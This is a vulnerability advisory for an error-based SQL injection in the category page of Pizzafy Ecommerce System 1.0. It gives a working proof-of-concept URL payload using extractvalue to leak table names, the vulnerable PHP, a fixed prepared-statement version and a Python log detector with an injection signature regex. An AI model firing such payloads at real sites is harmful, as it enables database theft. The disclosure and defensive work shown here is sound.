# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0

## Vulnerability Overview

* **Vulnerability Type**: Error-Based SQL Injection
* **Severity**: HIGH
* **Affected Version**: Pizzafy Ecommerce System 1.0
* **Description**: In the category `select` functionality, the `id` request parameter is interpolated directly into the `id` column comparison of a backend query without sanitization or parameterization, allowing attackers to inject SQL into database queries.
* **Vulnerable Endpoint**: `pizzafy/index.php?page=category&id=3`

## Impact Scope

* **Confidentiality**: Complete disclosure of database schema and user credentials.
* **Integrity**: Unauthorized deletion or modification of records.
* **Availability**: Service denial caused by large-scale data deletion.
* **Privilege Escalation**: Session hijacking and administrative access obtained through extraction of session data.

## Proof of Concept (PoC)

**Exploit Code (GET Request):**

```http
http://localhost/pizzafy/index.php?page=category&id=1%20AND%20extractvalue(1,CONCAT(0x7e,(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=database())%20LIMIT%200,1),0x7e)
```

**Vulnerable Code:**

```php
$id = $_GET['id'] ?? "";
if (empty($id)) {
    throw new ErrorException("Error: This page requires a category ID.");
}

// Vulnerable: the raw request parameter is interpolated into the SQL string.
$category_qry = $conn->query("SELECT * FROM category_list where id = $id");
if (!$category_qry) {
    // Vulnerable: the database error text is echoed to the client,
    // which is what makes the error-based technique above work.
    print $conn->error;
}

if ($category_qry->num_rows > 0) {
    $data = $category_qry->fetch_assoc();
} else {
    throw new ErrorException("Error: This page requires a category ID.");
}
```

## Remediation

1. **Use Prepared Statements**: Utilize parameterized queries to prevent SQL injection.
2. **Input Validation**: Validate and sanitize the `id` parameter, allowing only expected values.
3. **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection.
4. **Monitoring & Logging**: Track and alert on anomalous patterns, such as slow queries or repeated access attempts.
5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities.
6. **Error Handling**: Avoid exposing database-related errors in responses, as this information can aid attackers.

**Example of Fixed Code:**

```php
// Input validation: a category id is a positive integer, nothing else.
$id = isset($_GET['id']) ? (int)$_GET['id'] : 0;
if ($id <= 0) {
    throw new ErrorException("Error: This page requires a valid category ID.");
}

// Prepared statement: the id travels as a bound parameter, never as SQL text.
$stmt = $conn->prepare("SELECT * FROM category_list WHERE id = ?");
if ($stmt === false) {
    error_log("Database error: " . $conn->error);
    throw new ErrorException("An error occurred. Please try again later.");
}
$stmt->bind_param("i", $id);
$stmt->execute();
$category_qry = $stmt->get_result();
if (!$category_qry) {
    // Error handling: log the database detail server-side, return a generic message.
    error_log("Database error: " . $stmt->error);
    throw new ErrorException("An error occurred. Please try again later.");
}

if ($category_qry->num_rows > 0) {
    $data = $category_qry->fetch_assoc();
} else {
    throw new ErrorException("Error: Category not found.");
}
```
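Remediation items 2 and 4 can also be applied on the detection side: because the category endpoint only ever expects a positive integer `id`, any request whose decoded `id` is not a plain integer is anomalous and worth alerting on. The following Python is an added example, not code from the Pizzafy project or this advisory; the log lines and IP addresses are constructed, and the `/pizzafy/index.php` path and `page=category` parameter are taken from the vulnerable endpoint above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache/nginx combined format); the second
# line carries the advisory's PoC query string, the third a stray quote character.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /pizzafy/index.php?page=category&id=3 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /pizzafy/index.php?page=category&id=1%20AND%20extractvalue(1,CONCAT(0x7e,(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=database())%20LIMIT%200,1),0x7e) HTTP/1.1" 200 734
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /pizzafy/index.php?page=category&id=3%27 HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /pizzafy/index.php?page=home HTTP/1.1" 200 900
"""

# Pulls client IP, method, request target and status out of one combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Function names and column names in the error-based PoC above; a hit upgrades the reason.
ERROR_BASED_SIGNATURE = re.compile(r"extractvalue|updatexml|information_schema", re.I)


def is_expected_category_id(value):
    """The fixed code casts id to a positive integer, so that is the only legitimate shape."""
    return value.isdigit() and int(value) > 0


def flag_category_requests(log_text):
    """Return (client_ip, decoded_id, reason) for category requests whose id is not an integer."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable request line; skip rather than guess
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/index.php"):
            continue
        # parse_qs percent-decodes values and splits each pair on the first '=' only,
        # so the PoC's inner 'table_schema=database()' stays inside the id value.
        query = parse_qs(parts.query, keep_blank_values=True)
        if query.get("page") != ["category"]:
            continue
        for raw_id in query.get("id", [""]):
            if is_expected_category_id(raw_id):
                continue
            reason = "non-integer id"
            if ERROR_BASED_SIGNATURE.search(raw_id):
                reason = "error-based injection signature"
            findings.append((match.group("ip"), raw_id, reason))
    return findings
```

Run against a real access log, the same function gives a per-source count that can feed the repeated-attempt alerting the remediation list calls for.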